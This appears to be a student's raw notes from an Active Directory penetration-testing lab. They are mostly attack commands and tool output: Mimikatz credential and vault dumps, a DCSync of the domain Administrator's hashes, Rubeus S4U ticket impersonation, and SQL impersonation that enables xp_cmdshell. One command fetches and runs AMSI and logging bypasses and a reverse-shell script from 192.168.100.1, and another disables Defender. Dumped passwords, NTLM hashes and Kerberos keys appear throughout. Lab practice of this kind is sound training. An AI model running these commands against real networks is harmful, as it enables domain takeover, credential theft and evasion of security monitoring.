From studentuser got rights on CompanyAdministrators Group
Got user sharemanager
* Username : sharemanager
* Domain : CITADEL.CORP
* Password : Us3dForControllingFilesAcrossCitadel!
* Key List :
aes256_hmac 96a6ee62bbe3e8515aa892bada5652a729fd76406f462b0fea472fb77f1476ba
aes128_hmac 01d78d1d59a0ec9cb998ef0c39328e8e
rc4_hmac_nt ad1b41d88cfd57b08f0fb50b1eee2541
rc4_hmac_old ad1b41d88cfd57b08f0fb50b1eee2541
rc4_md4 ad1b41d88cfd57b08f0fb50b1eee2541
rc4_hmac_nt_exp ad1b41d88cfd57b08f0fb50b1eee2541
rc4_hmac_old_exp ad1b41d88cfd57b08f0fb50b1eee2541
Vault maybe helpful sometime
PS C:\\Users\\studentuser\\Desktop\\shared> .\\BetterSafetyKatz.exe "token::elevate" "vault::cred /patch" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
604 {0;000003e7} 1 D 16181 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0018cac5} 3 F 2061647 CITADEL\\studentuser S-1-5-21-253487801-221673152-1815095224-1113
(14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 2143679 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # vault::cred /patch
TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
UserName : 02uljdsqbshuulqj
Comment : PersistedCredential
Type : 1 - generic
Persist : 2 - local_machine
Flags : 00000000
Credential :
Attributes : 32
mimikatz(commandline) # exit
Bye
SQL
Invoke-SqlCmd -Query "exec sp_serveroption @server='sqlsrv3.glacis.corp',@optname='rpc out',@optvalue='TRUE'"
Invoke-SqlCmd -Query "exec sp_serveroption @server='sqlsrv3.glacis.corp',@optname='rpc',@optvalue='TRUE'"
Got dbmaster
* Username : dbmaster
* Domain : GLACIS.CORP
* Password : (null)
* Key List :
aes256_hmac 842cd67c2aa74fa6c6472796180f5063b7437a3fdbfb3f9903b0d0741f17e959
rc4_hmac_nt 1a0693ca4d6482238e5e6f46c36950ea
rc4_hmac_old 1a0693ca4d6482238e5e6f46c36950ea
rc4_md4 1a0693ca4d6482238e5e6f46c36950ea
rc4_hmac_nt_exp 1a0693ca4d6482238e5e6f46c36950ea
rc4_hmac_old_exp 1a0693ca4d6482238e5e6f46c36950ea
CD
.\\Rubeus.exe s4u /user:dbmaster /aes256:842cd67c2aa74fa6c6472796180f5063b7437a3fdbfb3f9903b0d0741f17e959 /impersonateuser:administrator /msdsspn:time/glacis-dc.glacis.corp /altservice:rpcss,host,http /nowrap /ptt
q
Get-SQLQuery -Instance sqlsrv3.glacis.corp -Verbose -Query 'EXECUTE AS LOGIN = ''sqlsrv3adm''; EXECUTE AS LOGIN = ''sa'';exec xp_cmdshell ''powershell -c "iex(iwr <http://192.168.100.1/sbloggingbypass.txt> -UseBasicParsing);iex(iwr <http://192.168.100.1/amsibypass.txt> -UseBasicParsing);iex(iwr <http://192.168.100.1/Invoke-PowerShellTcp.ps1> -UseBasicParsing)"'''
test
Get-SQLQuery -Instance sqlsrv3.glacis.corp -Verbose -Query "EXECUTE AS LOGIN= 'sqlsrv3adm';EXECUTE AS LOGIN= 'sa' ; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell ""powershell /c whoami"";"
PS C:\\users\\public> .\\BetterSafetyKatz.exe "lsadump::dcsync /user:glacis\\Administrator /domain:glacis.corp" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:glacis\\Administrator /domain:glacis.corp
[DC] 'glacis.corp' will be the domain
[DC] 'glacis-dc.glacis.corp' will be the DC server
[DC] 'glacis\\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/9/2022 3:25:03 AM
Object Security ID : S-1-5-21-525452939-2440030252-1192466273-500
Object Relative ID : 500
Credentials:
Hash NTLM: 3bb32a944573427d3abeb19be73745ef
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : c805b4214b0f809760bc2bee2d4051a0
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-EVPSMQ3QIQKAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f686871eaea8c5446a9010859ee76364ebdb47c3eb3f9d935e67184a7c06dc6b
aes128_hmac (4096) : 6ffe6c450cf36f010fe8dfb4089562ca
des_cbc_md5 (4096) : 16a449a886ad9810
OldCredentials
aes256_hmac (4096) : 7446f1d906a576f6bac344e90156595b6de661da4af0379d8ddbe185b4f4e7d9
aes128_hmac (4096) : f0f2eb741791ab4a5b57cb43bc836e05
des_cbc_md5 (4096) : 0d4991f1aebcae75
OlderCredentials
aes256_hmac (4096) : d4d4f28bd5cef101979deb1125e65a016782f709f65e27d239f012cb312262c7
aes128_hmac (4096) : 05a9e72e6ca72276fcad3081df0a8c14
des_cbc_md5 (4096) : bf3410ecbc01379d
Set-MpPreference -DisableRealtimeMonitoring $true
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 40139 (00000000:00009ccb)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/16/2024 3:50:53 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : GLACIS-DC$
* Domain : GLACIS
* NTLM : a28e4e5320b7cb795d01f7226b496f53
* SHA1 : 8a88a749e79983cbc4a0126a81316c264a54f4a9
tspkg :
wdigest :
* Username : GLACIS-DC$
* Domain : GLACIS
* Password : (null)
kerberos :
* Username : GLACIS-DC$
* Domain : glacis.corp
* Password : 15 64 c3 41 be 35 31 73 f3 fe 43 8a 84 0e 3d 8c 1b d9 bb ae 55 4e 83 9e 2a e2 bd c4 1b c0 30 80 76 2c 00 4b ec 87 b0 58 fe b6 99 3a 9c a6 81 0e f1 26 2f 5e 52 4d 4c 17 48 11 1f ce b6 44 f7 b1 4d 22 58 62 12 a1 c9 ed 94 d2 c6 29 2a 2e d0 51 24 e8 27 09 a4 2f 28 61 32 52 6a 96 87 d6 b9 41 b6 7e fb e5 59 1c aa ce b6 0b bb 4f 18 08 4a f1 18 bc 18 a9 1a 48 a2 d2 6c ac 8e 4d 4e ed 3e c7 0e 70 01 f5 41 e9 45 48 f8 59 f0 99 6e 6e 2f 4f d6 5a 5f 52 92 f3 aa dc 48 89 ca 8f d4 19 a1 87 53 b8 63 46 2e 69 1d d8 44 49 f3 af 87 63 cf 1d 13 62 dc 2c a2 c4 96 c0 2a f2 96 bd aa 09 04 9b 4c a7 b6 78 86 5c 3d 51 db 5a 7c 5e 86 70 ba 9d cd 5a 41 ac a8 5f 7c b3 8a 19 1e 67 9a d5 4b e1 09 a5 24 32 64 f9 ea 7e 7e e4 ea 0d 51 d0 67 4d
ssp :
credman :
Add-DomainGroupMember -Identity "GroupName" -Members "UserName"
SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';